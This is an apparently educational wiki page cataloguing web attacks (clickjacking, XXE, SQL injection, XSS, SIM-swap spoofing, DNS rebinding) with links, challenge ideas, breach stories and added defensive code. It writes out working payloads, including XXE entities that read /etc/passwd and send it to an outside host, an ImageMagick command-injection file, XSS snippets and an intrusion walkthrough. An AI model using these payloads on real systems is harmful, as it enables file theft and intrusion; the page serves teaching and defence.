Cyber Attacks

From Teach The Net
Revision as of 17:33, 6 November 2018 by Emeth (OpSec Violations)

Standard Hacks

https://srcincite.io/blog/2018/10/02/old-school-pwning-with-new-school-tricks-vanilla-forums-remote-code-execution.html

Facebook Business Takeover – These aren't the access_tokens you're looking for https://philippeharewood.com/facebook-business-takeover/

https://randywestergren.com/xss-vulnerabilities-in-multiple-iframe-busters-affecting-top-tier-sites/

Race Conditions

css timing attack jquery(location.hash) https://blog.sheddow.xyz/css-timing-attack/

Information Leakage

Assuming this all works out, the image in this tweet is also a valid ZIP archive, containing a multipart RAR archive, containing the complete works of Shakespeare. https://twitter.com/David3141593/status/1057042085029822464

Client-side Validation

BitGrail javascript validation for withdrawal

BitGrail (a cryptocurrency exchange) was hacked for $170 million, allegedly because "the checks for whether you had a sufficient balance to withdraw were only implemented as client-side JavaScript".
- Tweet

CSRF

Challenges

* Hackme
* Be sure to do both GET (image) and POST (form) examples. 
* To defeat origin header, use image/get hosted on domain (e.g. profile image)
* To defeat CSRF token, have a javascript file that sets the url to a variable name exposing the CSRF token if you include that javascript file. link (also have another where the CSRF token just has to be unused before, or unique, or doesn't validate at all)

Clickjacking

Informative Blog

CSS has a property called position that allows an element to sit on top of another element. In addition, the property pointer-events allows click events to pass through an element, so that the click is actually registered on the element underneath. When the two are combined, I can stack a fake button on top of the actual button and trick you into clicking it...

If you have logged in to Facebook, then what you just did was to like my blog post (which I appreciate) without realizing it. This time, opacity is used instead of pointer-events. opacity is a CSS property that controls the opacity of an element.

People have been exploiting Clickjacking with web widgets. Many social media sites were actually vulnerable to this. For example, you could use Clickjacking to gain followers with the Twitter follow button, and a more recent issue with the LinkedIn AutoFill button leaked visitors' information to third-party websites. Sites have started fixing it by requiring additional user interactions, for example, opening a new window for users to confirm an action. In fact, Likejacking probably no longer works nowadays. If you try to click the above Facebook like button, it may turn into a "Confirm" button which requires you to click again after you click it. Essentially, they now use an algorithm to determine if an embedding site is trustworthy and hence the number of additional user interactions. Ultimately this is a trade-off between usability and security.

However, X-Frame-Options: SAMEORIGIN has a serious flaw... At the time of writing, only Chrome and Firefox have fixed the issue by making the check against all frame ancestors, which is compliant with CSP's frame-ancestors 'self'.

Actually don't even click anything. Malicious websites can simply track your cursor's position and change the invisible button/iframe's position accordingly. So even if you make a click by mistake you will be forced to click on something else.

There's no reliable way to prevent Clickjacking...

- Article
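
An added example (not the article's code) that models the two framing checks the quoted passage compares, using constructed origins: the older X-Frame-Options: SAMEORIGIN implementation that only looked at the top-level document, versus CSP frame-ancestors 'self', which checks every ancestor, plus the header pair a server should send. The nested case assumes the protected site has some page that embeds third-party content.

```python
"""Added example (not from the original page): why X-Frame-Options: SAMEORIGIN
is weaker than CSP frame-ancestors 'self'.  All origins below are constructed.

A framed page sits under a chain of ancestor browsing contexts: its parent,
the parent's parent, ... up to the top-level document.  The older
X-Frame-Options check in some browsers compared the page's origin only with
the TOP-LEVEL origin; CSP frame-ancestors 'self' requires EVERY ancestor to
match.
"""
from typing import Dict, List


def xfo_sameorigin_allows(page_origin: str, ancestors: List[str]) -> bool:
    """Top-level-only check (the flawed X-Frame-Options behaviour).

    ``ancestors`` is ordered innermost first: [parent, ..., top].
    """
    if not ancestors:  # not framed at all
        return True
    return ancestors[-1] == page_origin


def csp_self_allows(page_origin: str, ancestors: List[str]) -> bool:
    """CSP frame-ancestors 'self': every ancestor must be same-origin."""
    return all(origin == page_origin for origin in ancestors)


def anti_framing_headers() -> Dict[str, str]:
    """Headers giving the strong check where CSP is supported, with
    X-Frame-Options kept as a fallback for browsers without CSP."""
    return {
        "Content-Security-Policy": "frame-ancestors 'self'",
        "X-Frame-Options": "SAMEORIGIN",
    }


def compare(page_origin: str, ancestors: List[str]) -> Dict[str, bool]:
    """Both verdicts side by side for one ancestor chain."""
    return {
        "xfo_sameorigin": xfo_sameorigin_allows(page_origin, ancestors),
        "csp_frame_ancestors_self": csp_self_allows(page_origin, ancestors),
    }


SITE = "https://shop.example"      # constructed: the page being protected
ATTACKER = "https://evil.example"  # constructed

# The case the top-only check gets wrong (hypothetical scenario): the site
# has a page that embeds third-party content, the attacker's content embeds
# the target page.  The top-level document is the site itself, so the
# top-only check passes even though a cross-origin frame sits in between and
# can overlay the target exactly as the article describes.
NESTED = [ATTACKER, SITE]

if __name__ == "__main__":
    for label, chain in [("not framed", []),
                         ("framed by attacker", [ATTACKER]),
                         ("nested through same-origin top", NESTED)]:
        print(label, compare(SITE, chain))
    print(anti_framing_headers())
```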

Quickjack

http://samy.pl/quickjack/

SQL Truncation

Challenges

* CTF Sql Truncation Challenge

File Upload/SSRF/XML Parsing

LFI: https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
LFI to RCE tricks: https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html

Exploit Remote Code Execution via jQuery-File-Upload <= 9.x (ImageMagick/Ghostscript) | Vulnspy Blog https://blog.vulnspy.com/2018/10/23/jQuery-File-Upload-9-x-Remote-Code-Execution-With-ImageMagick-Ghostscript/

Challenges

* HackMe File Upload
* SSRF and querying AWS metadata: https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/
* Upload an XSS remote file inclusion vulnerability
* XML: read files on the system and send the output to a remote URL (XXE):
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]>
<foo>&callhome;</foo>
https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/
Same XML trick as above, but using a .docx extension (a .docx is just a compressed archive of XML files)
https://web.archive.org/web/20151107145453/www.attack-secure.com/blog/hacked-facebook-word-document
So, according to Mohamed, he created a .docx file, opened it with 7zip to extract the contents, and inserted the following payload into one of the XML files:
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.37.102.90/ext.dtd"> %dtd;
%send;
]]>
(From the Web Hacking 101 book; source: https://web.archive.org/web/20151107145453/www.attack-secure.com/blog/hacked-facebook-word-document)
https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://www.davidsopas.com/wikiloc-xxe-vulnerability/
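
An added example (not from the page or the linked write-ups) of the parser side of the XXE trick above, in Python's stdlib xml.sax: the SYSTEM entity reads a constructed secret file when external entities are enabled, the same document yields nothing when they are disabled, and a hardened entry point rejects any DOCTYPE up front. The temp file and the document are constructed here.

```python
"""Added example (not from the original page): parsing untrusted XML so that
the SYSTEM entity trick above cannot read local files.  The secret file and
the document are constructed here; Python's stdlib xml.sax is the parser."""
import io
import os
import re
import tempfile
import xml.sax
import xml.sax.handler


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data so we can see what the entity expanded to."""

    def __init__(self) -> None:
        super().__init__()
        self.text: list = []

    def characters(self, content: str) -> None:
        self.text.append(content)


def parse_text(data: bytes, resolve_external: bool) -> str:
    """Parse ``data`` and return its character content.

    ``resolve_external`` maps to xml.sax's feature_external_ges.  Leaving it
    off (the default since Python 3.7.1) is what stops file:// entities from
    being fetched; switch it on only to reproduce the unsafe behaviour.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.text)


_DOCTYPE = re.compile(rb"<!DOCTYPE")


def parse_untrusted(data: bytes) -> str:
    """Hardened entry point: refuse any document carrying a DTD at all.

    A DTD is what lets a document declare entities (external ones for file
    reads, nested ones for entity-expansion denial of service).  Ordinary
    data documents never need one, so reject rather than try to sanitise.
    """
    if _DOCTYPE.search(data):
        raise ValueError("DOCTYPE declarations are not accepted")
    return parse_text(data, resolve_external=False)


def build_sample() -> bytes:
    """Write a throwaway file standing in for /etc/passwd and return an XXE
    document pointing at it (same shape as the payload on this page)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("SECRET-CONSTRUCTED")
    uri = "file://" + path.replace(os.sep, "/")
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE foo [\n'
        b'<!ELEMENT foo ANY >\n'
        b'<!ENTITY xxe SYSTEM "' + uri.encode() + b'" >\n'
        b']>\n'
        b'<foo>&xxe;</foo>'
    )


def demo() -> dict:
    """Run the same document through the unsafe, safe and hardened paths."""
    doc = build_sample()
    result = {
        "unsafe": parse_text(doc, resolve_external=True),
        "safe": parse_text(doc, resolve_external=False),
    }
    try:
        parse_untrusted(doc)
        result["hardened"] = "accepted"
    except ValueError as exc:
        result["hardened"] = str(exc)
    return result


if __name__ == "__main__":
    print(demo())
```
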

ImageMagick

http://nahamsec.com/exploiting-imagemagick-on-yahoo/
Now, interestingly, ImageMagick defines its own syntax for Magick Vector Graphics (MVG) files. So, an attacker could create a file exploit.mvg with the following code:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
Django cookie signing key exposed: can this lead to code execution?
Rails example: https://hackerone.com/reports/134321
Smarty template injecting into email to read files / execute php code
https://hackerone.com/reports/164224


Javascript in filename
https://hackerone.com/reports/329950
https://hackerone.com/reports/330356
Moodle, code injection via math formula
https://blog.ripstech.com/2018/moodle-remote-code-execution/

Microsoft Word Document upload to stored XSS

* File upload on site, only takes in .docx files...
* Extension validation is client-side. Can upload file with any extension.
* File download is triggered via a url, without `Content-Disposition: attachment`, expectation is download is just triggered based off docx extension. So if we can upload a file the browser can render, it will load instead of being downloaded.
* On a test docx file, file downloaded does not exactly match file uploaded - implies some processing is done on the file when uploaded.
* Hack: Take a valid .docx file, upload and then download. Find areas of strings that were not changed by server-side processing, insert html in those areas. Change file extension to .html, and then upload. 'Download' link should now host html page running your javascript.

File upload via android app to get shell

https://asaf.me/2018/07/23/attacking-the-attackers/

Phone call xml parsing

https://hackerone.com/reports/395296

Phar

https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf?

Patreon debugger

https://labs.detectify.com/2015/10/02/how-patreon-got-hacked-publicly-exposed-werkzeug-debugger/

SQL Injection

Challenges

SQL injection without quotes: https://eternalnoobs.com/sqli-without-quotes/ (source here: https://hack2learn.pw/mysql/)

* SQL Injection Auth Code
* SQL Injection Login
* multiple
For example, the site https://www.rails-sqli.org/ maintains a list of common SQLi patterns in Rails that result from developer mistakes.
Drupal: https://hackerone.com/reports/31756

Blind SQL injection:
* Yahoo Sports blind SQL injection: https://web.archive.org/web/20140416093035/http://esevece.tumblr.com:80/
* Blind SQL injection via email unsubscribe: https://hackerone.com/reports/150156

SDK hidden behind access code, but with a deadline

  • The iDynamo SDK download access code is sent by US mail with 1-2 week delivery. But there was a deadline to create the product... and the team already had the device without the SDK.

Heartland Payment Systems

The complaint said the 2009 data breach can be traced to July 24, 2007, when malicious code was installed on Heartland’s system via an SQL injection attack targeted at collecting magnetic strip sequences. Malware was installed May 14, 2008.  According to Lexington and Beazley, Trustwave’s assessments during this time didn’t result in a report of malicious code or malware on Heartland systems.

As a result of the breach going undetected, per the complaint, hackers accessed roughly 100 million credit and debit card numbers from more than 650 financial service companies, exposing Heartland to more than $148 million in settlement fees for its liability, damages, remediation costs and other expenses. Further, Heartland defended itself in at least 16 consumer class action complaints, 14 class actions from financial institutions and four securities class actions.

- Article

Affiliate backend pagination leads to downfall

  • Paul Le Roux hunted by the US Government. They caught him because of a simple SQL Injection flaw in the pagination of an affiliate backend on RX Limited.

A lot of shady services online allow affiliates or resellers to take a cut and expand their reach.

In an invite-only affiliate control panel of this site, there was a SQL injection flaw in their pagination. Using this SQL injection, the commenter dumped the database and saw all affiliate payouts, including the affiliates receiving the biggest payments (who tended to be the big names / biggest scammers), along with how they were paid.

Original comment on Hackernews thread featuring this article:

Guys I can tell you how he got caught. At around 2011 I hacked the RXLimited backend through a security flaw on Christmas Eve.

They had one simple SQL Injection flaw in pagination in their affiliate backend. Through this I was able to extract the VPN config of the webserver including the keys, which I then used to log in to their VPN with my computer.

After snooping around a bit, I found that their backup server had Apache directory listing enabled, and I was able to download several hundred megabytes of database backups. I got kicked out of the VPN several times but I was able to continue the download to completion.

From these database backups I extracted the payment information of all affiliates, compiled a list sorted by sum(payouts) desc including SWIFT payment infos and a detailed list of payments to affiliates with date and amount.

This list was submitted through my local law enforcement in the EU to their counterparts in the US. I never heard back from them, but using this info you could easily find out where the money was moved around with all shady figures attached.

You can believe me or not, but it was a nice hobby to fuck the bad guys over. The money moving around in this business still astonishes me. And all through a simple SQLi in pagination in the most remote view of their affiliate backend...
- Link to original Hackernews comment (since censored)
- Archived snapshot of comment
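
An added example (not the page's code, nor anything from the affiliate backend in the story) of the pagination mistake described above beside a version that cannot be exploited: the page number is validated as a positive integer and bound as a query parameter instead of being pasted into the SQL text. Table, rows and sqlite3 as the database are constructed stand-ins.

```python
"""Added example (not the page's code, nor the affiliate backend's): the
pagination mistake behind the story above, beside a version that cannot be
exploited.  Table and rows are constructed; sqlite3 stands in for the real DB."""
import re
import sqlite3
from typing import List, Tuple

PAGE_SIZE = 10
_PAGE_RE = re.compile(r"[1-9][0-9]*")  # positive decimal integer, nothing else


def page_query_unsafe(page: str) -> str:
    """The vulnerable shape: the page value arrives as text from the query
    string and is pasted straight into the SQL, so whatever the caller sends
    becomes part of the statement."""
    return (
        f"SELECT id, name FROM affiliates ORDER BY id "
        f"LIMIT {PAGE_SIZE} OFFSET ({page} - 1) * {PAGE_SIZE}"
    )


def parse_page(page: str) -> int:
    """Accept only a positive decimal integer, rejected before any SQL exists."""
    if not _PAGE_RE.fullmatch(page):
        raise ValueError("page must be a positive integer")
    return int(page)


def page_accepted(page: str) -> bool:
    """True when the value would reach the database, False when rejected."""
    try:
        parse_page(page)
        return True
    except ValueError:
        return False


def fetch_page(conn: sqlite3.Connection, page: str) -> List[Tuple[int, str]]:
    """Hardened: validated integer, passed as a bound parameter.  sqlite3
    accepts placeholders in LIMIT/OFFSET; with a driver that does not, the
    validated int is still safe to format because it can only contain digits."""
    offset = (parse_page(page) - 1) * PAGE_SIZE
    cur = conn.execute(
        "SELECT id, name FROM affiliates ORDER BY id LIMIT ? OFFSET ?",
        (PAGE_SIZE, offset),
    )
    return cur.fetchall()


def build_db() -> sqlite3.Connection:
    """Constructed sample: 25 affiliates, so page 3 holds ids 21..25."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE affiliates (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO affiliates (name) VALUES (?)",
        [(f"affiliate-{i:02d}",) for i in range(1, 26)],
    )
    return conn


if __name__ == "__main__":
    db = build_db()
    print(fetch_page(db, "3"))
    print(page_query_unsafe("not-a-number"))  # the text lands in the SQL verbatim
    print(page_accepted("not-a-number"))      # False: rejected before any query
```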

Mongodb injection to account takeover forgot password

https://hackerone.com/reports/386807

Metasploit/CVE Database

Wordpress Challenges

* Sample Repo
* toolkit

Security Company Challenge

Background

Computer security company sells security products. In an effort to get publicity, puts up a secure server, offers a macbook for anyone who hacks into it.

Review products company sells

  • Note that their documentation is on a Confluence wiki. If they use Confluence wiki so heavily for user-facing docs, likely they use them internally too.

Google confluence wiki

  • Find that it's a self-hosted solution, complex and thus hard to update.
  • Scan for their version in CVE database. Find a hit! CVE-2015-8399 allows unauthenticated users to browse and read files from disk that are accessible to the Confluence user, and docs.inversoft.com was vulnerable to it
  • Review the files readable through the above exploit; find nothing of significance (no configuration file).

Nmap scan on domain where confluence wiki was hosted

  • Find postgres database, mysql database, elasticsearch, ssh, several http services. Get versions of each.
  • Find elasticsearch is old, and thus vulnerable to CVE-2015-1427 which allows remote code execution.

Now have SSH access as non-root user

  • Could read anything elasticsearch could see, Confluence was also running under this same user!
  • Scanning around, found database credentials confluence used to talk to postgres.
  • Used credentials above to get a dump of the Confluence database for off-line perusing.

Scanning the database

  • It was indeed used for internal documentation
  • Contained various passwords and keys, including a Linode username/password (the target was on Linode). Turns out it's a valid Linode account, but not the right one.

Thinking through next steps

  • use our access to intercept a password reset email for the real linode account?
  • use our access to make a convincing phish email
  • Rescanning our existing gathered info... find in the elasticsearch account's root directory a variety of shared dev files, including api keys to the real linode instance! Connect in, dump db.

Overall

  • utility servers used by devs are the key

Article

MySQL: sql injection escalate to code execution CVE-2016-6662

- Article

XSS

Challenges

Vue.js Server-side XSS
* XSS attack is filtered out, but can inject a vue.js template e.g. `{{constructor.constructor("alert('xss')")()}}`
* This exploit is possible because the app is mixing serverside rendering and clientside rendering.
Angular too: https://hackerone.com/reports/125027
Jinja: https://hackerone.com/reports/125980
Cookie stealing challenge
And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):
Cheatsheet
html injection via encoding
https://hackerone.com/reports/104543
markdown processing injection (instead of bbcode)
https://hackerone.com/reports/112935
Error message embedding / phishing html
https://hackerone.com/reports/111094
Myspace Samy worm
Blind XSS (e.g. renders fine on user side, but admin side has a special page that doesn't escape it). XSS Hunter tool.
Reflected XSS (e.g. via search): https://hackerone.com/reports/106293
XSS in file name shopify example: https://hackerone.com/reports/95089
Bypass CSP https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa

XSS with SVG?

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('You have been hacked!');
</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS');
</script>
</svg>
- Post 1
- Post 2

XSS bypass tricks

Site replaces all urls with redirector... but not their own urls. Can use double slash to bypass. https://samcurry.net/the-12000-intersection-between-clickjacking-xss-and-denial-of-service/

XSS to RCE in Atom

https://statuscode.ch/2017/11/from-markdown-to-rce-in-atom/

Spoofing

Challenges

- Hackme Social Engineering

Spoof 2-factor auth text message

The reader’s daughter had received a text message claiming to be from Google, warning that her Gmail account had been locked because someone in India had tried to access her account. The young woman was advised to expect a 6-digit verification code to be sent to her and to reply to the scammer’s message with that code.

Cobb’s daughter received the scam text message because she’d enabled 2-factor authentication on her Gmail account, selecting the option to have Google request that she enter a 6-digit code texted to her cell phone each time it detects a login from an unknown computer or location (in practice, the code is to be entered on the Gmail site, not sent in any kind of texted or emailed reply).

In this case, the thieves already had her password — most likely because she re-used it on some other site that got hacked. Cobb says he and his daughter believe her mobile number and password may have been exposed as part of the 2012 breach at LinkedIn.

In any case, the crooks were priming her to expect a code and to repeat it back to them because that code was the only thing standing in the way of their seizing control over her account. And they could control when Google would send the code to her phone because Google would do this as soon as they tried to log in using her username and password. Indeed, the timing aspect of this attack helps make it more believable to the target.

- Article
T-Mobile's website had a security flaw: a URL endpoint returned a user's email address, account details and the phone's IMSI network code. The user's phone number was passed in the URL, but a user could change that phone number to any other T-Mobile number and obtain the information for it. This information is all a hacker needs to call T-Mobile and transfer control of the phone number to a different SIM under their control. With control of the phone number, they can now receive 2-factor auth text messages.

In fact, this is exactly what happened to Techcrunch writer John Biggs on August 22nd. After impersonating him and obtaining a replacement for his T-Mobile SIM, a hacker was able to quickly change his Gmail, Facebook, and other passwords, even though they were protected by two-factor SMS authentication.

- Article
- Video demonstrating the exploit
- Techcrunch writer's side of the story
In these cases, the fraudsters can call a customer service specialist at a mobile provider and pose as the target, providing the mark’s static identifiers like name, date of birth, social security number and other information. Often this is enough to have a target’s calls temporarily forwarded to another number, or ported to a different provider’s network.
- Krebs Article

More stories of porting/stealing cell phone numbers to defeat 2 factor auth:

Typo-squatting a domain for SSH password

Question: When you accidentally attempt to connect to the wrong server with password credentials is it possible for the administrator to read and log the password you used?

Answer: Yes

- Stackoverflow Question

GMAIL sent folder spoof

Spoofing FROM address to get into GMAIL Sent folder
* A normal spoofed 'from' email, sent FROM a gmail user TO another gmail user, will actually appear in the SENT folder of the real FROM user's account.

Unicode characters in URL spoof

Spoofing URL with look-alike unicode characters on Firefox / TOR Browser
* Firefox (and Tor Browser) display unicode characters in the URL indistinguishably from ascii characters. Chrome and other browsers convert them to punycode.

CEO whaling/spear phishing

Whaling is a well-oiled social engineering scam that sees criminals dupe financial controllers at large lucrative organisations. Whalers' main method is to send emails that appear to originate from chief executive officers, bearing instructions to wire cash into nominated bank accounts.

It works. The FBI estimates some $2.2bn (£1.7bn, A$2.9bn) in losses have arisen from nearly 14,000 whaling cases in the seven months to May this year. Some $800m (£601m, A$1bn) in losses occurred in the 10 months to August 2015.
Harpooned companies include Mattel, which shipped and by dumb luck recouped $3m its executive sent to a hacker's Chinese bank account; Ubiquiti, which lost $46.7m in June last year; and Belgian bank Crelan, which lost $78m in January.

They join Accenture, Chanel, Hugo Boss, HSBC, and countless smaller victims.

- Article
Brisbane council loses $500k to scammers

- Article
Barbie-brained Mattel exec phell for phishing, sent $3m to China

- Article
Ubiquiti stung US$46.7 million in e-mail spoofing fraud

- Article
Vigilante hacks back at CEO wire transfer scammers, sending a poisoned PDF pretending to be a transaction confirmation. When opened, "We were able to get the Windows 10 usernames and hashes which are tied by default to Outlook."

- Article

Spoofing Banks

Someone had sent emails to the bank’s employees with Microsoft Word attachments, purporting to be from suppliers such as ATM manufacturers. It was a classic spear-phishing gambit. When opened, the attachments downloaded a piece of malicious code based on Carberp, a so-called Trojan that unlocked a secret backdoor to the bank’s network. The malware siphoned confidential data from bank employees and relayed the information to a server the hackers controlled. Delving deeper, the Kaspersky team found that intruders were taking control of the cameras on hundreds of PCs inside the organization, capturing screenshots and recording keystrokes. Soon, the researchers learned that other banks in Russia and Ukraine had been hacked the same way...

Just as the police started to make strides, the Carbanak crew opened another front, says Kaspersky’s Emm. In the first half of 2016, the thieves sent spear-phishing emails that looked like messages from legitimate financial institutions. When bank employees opened the emails’ attachments, they downloaded malware based on a program called Cobalt Strike, which is designed to let security officers hack their own institutions to find vulnerabilities, like in a war game. The Carbanak-Cobalt gang was able to extract $12 million per heist, says Europol. The thieves’ nimbleness was sobering. “Sometimes the investigation looked good,” Ruiz says, “and sometimes it looked like we’d reached a dead end.”

- Article

DOS

Block Skype Accounts trivially

Block anyone's Skype account
* Have about 20 different accounts search for target user X and click Report User
* Done, victim is now blocked from Skype and locked out.

Shutdown iPad Kiosks with sunlight

This reminds me of a “bug” I found when working for a company that sells package lockers to apartment buildings. We used iPads for the user interface and had monitoring in place to alert us if an iPad went offline.
At only one location with two iPads one would go offline almost every day (but not every day) between 12pm and 1pm, for 10-20 minutes. Never the same time of day, and never the same length of time. It was always the same iPad, the other one on that network stayed online the entire time.
We replaced the iPad and the problem persisted. Finally I got fed up, put my phone on silent, ignored everything, and watched the Dropcam feed for the 2 hours near the usual time. Slowly I saw the sun light up the lockers, eventually shining on the iPad. Ten minutes later, after sitting in direct sunlight, it went offline. As the sun moved, the iPad went back into shadow and came online on its own.
It was overheating and shutting itself off until it cooled down. The time changed because day lengths change, and the days it didn’t go offline were cloudy.
- Hackernews thread

DNS Rebinding

Tools

* Open source tool: Jaqen
* Hosted tool used via subdomains: rbndr
* Defcon Talk: Achieving reliable DNS rebinding 2017

Electrum, a bitcoin client

* Has a JSON-RPC API enabled by default, with CORS enabled. This made it trivial for any website to connect to your wallet's API and dump the seeds. In this Github Issue, the developers decide to disable CORS. This still leaves it vulnerable to DNS rebinding attacks.
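
An added example (not Electrum's code) of the mitigation that closes the remaining DNS rebinding hole: a local JSON-RPC style server that only answers when the Host header names loopback. After a rebinding flip the attacker's hostname resolves to 127.0.0.1, so the victim's browser connects to the local service, but the Host header still carries the attacker's name; disabling CORS does not stop the request being sent. Port and hostnames are constructed.

```python
"""Added example, not Electrum's code: a local JSON-RPC style server that
refuses DNS-rebinding traffic by validating the Host header.

After a rebinding flip the attacker's hostname resolves to 127.0.0.1, so the
victim's browser connects to the local service, but the Host header still
carries the attacker's name.  Turning off CORS does not help: the browser
sends the request regardless, and CORS only decides whether the page may read
the response.  Port and hostnames below are constructed."""
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, Iterable, Optional

LISTEN_PORT = 7777  # constructed
ALLOWED_NAMES = {"localhost", "127.0.0.1", "[::1]"}


def host_header_allowed(host: Optional[str], port: int = LISTEN_PORT) -> bool:
    """True only for an explicit loopback name with the port we listen on.

    A rebinding attack cannot change this header: the browser fills it in
    from the URL the page requested, which names the attacker's domain.
    """
    if not host:
        return False
    name, sep, port_part = host.strip().lower().rpartition(":")
    if not sep or not port_part.isdigit() or int(port_part) != port:
        return False
    return name in ALLOWED_NAMES


def classify(hosts: Iterable[str]) -> Dict[str, bool]:
    """Decision for each candidate Host value (quick self-check)."""
    return {h: host_header_allowed(h) for h in hosts}


class RebindSafeHandler(BaseHTTPRequestHandler):
    """Minimal JSON-RPC-shaped endpoint that checks Host before doing work."""

    def do_POST(self) -> None:
        if not host_header_allowed(self.headers.get("Host")):
            self.send_error(403, "Host header is not a loopback name")
            return
        length = int(self.headers.get("Content-Length") or 0)
        request = json.loads(self.rfile.read(length) or b"{}")
        body = json.dumps({"id": request.get("id"), "result": "ok"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve() -> None:
    """Bind to loopback only; the Host check covers the rebinding case that
    loopback binding alone does not."""
    HTTPServer(("127.0.0.1", LISTEN_PORT), RebindSafeHandler).serve_forever()


if __name__ == "__main__":
    print(classify(["localhost:7777", "[::1]:7777", "attacker.example:7777",
                    "localhost", "127.0.0.1:80"]))
    serve()
```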

Political Hacks

Hacking Democrat files 2003

Miranda said that he gained access to the documents after a junior staffer on the committee discovered that they were posted on a server shared by Republicans. He acknowledged reading many of the documents and said he mainly used them to glean insights into how Democrats were preparing for hearings.
[...]
A congressional report blamed Miranda and another staffer for viewing the documents, and Miranda resigned from a Senate position in 2004. He said in the interview that he was never charged in the matter and that he never considered his action to be hacking, because the documents were on a shared computer server.
Source
The Nomination Unit clerk was interviewed on November 23, 2003, as part of this investigation and subsequently re-interviewed twice, with counsel present, later in the investigation. His version of events remained consistent each time he was interviewed and the investigation verified much of what he told investigators. He and his counsel remained cooperative throughout the investigation.

The clerk first became aware that he could access the files of Democratic staff some time in October or November of 2001. He made this discovery after watching the Committee's Systems Administrator perform some work on his computer. An admittedly curious person, the clerk attempted to duplicate what the System Administrator had done. In so doing, he was able to observe all of the network's other users' home directories. He then clicked on different folders to see which ones he could access; he was able to access some folders, but not others. The folders that he could access, he stated, belonged to both Republican and Democratic staff.

The Nominations Unit clerk reported that he had access to the home directories of other users shortly after beginning his employment in the fall of 2001 until the spring of 2003. Initially he printed approximately 100-200 pages of documents pertaining to Judge Pickering's nomination and gave them to one of his supervisors. Two days later that supervisor and another admonished him not to use the Democratic documents and those that he had given his supervisor were shredded.

Manuel Miranda joined the staff of the Judiciary Committee in December 2001. A short time after Mr. Miranda was hired, the clerk showed him how he could access Democratic files. The clerk who initially discovered how to access the files told investigators that he was not sure what to look for in the files, so Mr. Miranda would guide him as to what information was helpful. Mr. Miranda would often suggest which directories he should concentrate on and would sometimes tell him that there was something new in a particular folder and ask the clerk to print it for him. Mr. Miranda admitted accessing the computer files of Democratic staff himself on one or two occasions.

The Nominations Unit clerk explained that he frequently searched the folders of some Democratic staff on an almost daily basis while working on the nomination of Judge Priscilla Owen. In fact, over the course of accessing other users' files for approximately 18 months, the clerk downloaded thousands of documents. Forensics analysis of a compressed zip folder from his workstation where he kept these documents identified 4,670 files, the majority of which appeared to be from folders belonging to Democratic staff. During the approximately 18 months the clerk accessed other users' files, he stated that he had four or five different computers assigned to him and that regardless of the hardware he used he was able to access this information.

In January 2003, Mr. Miranda left the Judiciary Committee and took a position in the office of Majority Leader Frist. The Nominations Unit clerk and Mr. Miranda both admitted that the clerk continued to provide Democratic - and also Republican - documents to Mr. Miranda after he left the Judiciary Committee. Forensic analysis of the e-mail traffic between the two confirms this. In March or April 2003, the clerk was re-assigned to another Unit in the Judiciary Committee. About the same time (April 2003) the Committee's server was upgraded and the clerk believed that prevented him from being able to access other users' files on the server.

[...]

The forensic review of the Judiciary Committee servers that was conducted is consistent with the clerk's explanation of how he was able to access Democratic files. The forensic analysis provided investigators with two "snapshots" of the network's permission settings - one from July 2003 (when a file copied from the older server in April was deleted) and one from November 2003 when the server was imaged for this investigation.

